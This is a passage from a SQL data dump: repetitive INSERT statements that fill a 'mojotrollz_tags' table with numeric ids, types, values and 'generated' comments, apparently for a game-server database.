`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32383, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32385, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32389, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32391, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32404, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32416, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32424, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32425, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32427, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32429, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32431, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32570, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32571, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32578, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32580, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32581, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32582, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32583, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32584, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32585, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32590, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32591, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32592, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32593, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32594, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32595, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32596, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32833, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32834, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32835, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32842, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32843, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32845, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32846, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32847, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32848, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32849, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32850, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32851, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32852, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32853, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32854, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32857, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32859, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32860, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32861, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32862, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32863, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32878, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32879, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32880, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32881, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32882, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32883, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32884, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32885, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (33998, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (33999, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34012, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34013, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34025, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34026, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34027, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34028, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34029, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34030, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34031, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34032, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34033, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34034, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34167, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34168, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34357, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34360, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34571, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35251, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35252, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35593, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35593, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35594, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35594, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35595, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35595, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35596, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35596, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35597, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35597, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35598, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35598, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35844, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36070, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36071, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36077, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36080, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36082, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36083, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36085, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36086, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36090, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36091, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36092, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36093, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36094, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36095, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36102, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36105, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36113, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36118, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36126, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36127, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36396, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36397, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36398, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36645, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36738, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36738, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36977, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36979, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36980, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36981, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36982, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36983, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36984, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36985, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36986, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36987, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36988, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36989, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36996, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36997, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36998, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37025, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37026, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37027, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37028, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37029, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37030, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37031, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37032, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37033, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37034, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37089, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37090, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37091, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37092, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37093, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37094, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37095, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37097, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37099, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37118, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37478, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38028, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38029, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38030, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38147, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38491, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38492, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38493, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38494, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38495, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40197, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40198, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40198, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40199, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40199, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40200, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40200, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40201, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40201, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40298, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40299, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40301, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40303, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41185, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41186, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41187, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41188, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41189, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41190, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41191, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41192, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41193, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41194, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41195, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43116, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43117, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43118, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43119, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43120, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43121, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43122, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (47296, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (47297, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48403, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48403, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48405, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48405, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48406, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48406, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48407, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48407, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48408, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48408, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48409, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48409, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48410, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48410, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48411, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48411, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48412, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48412, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 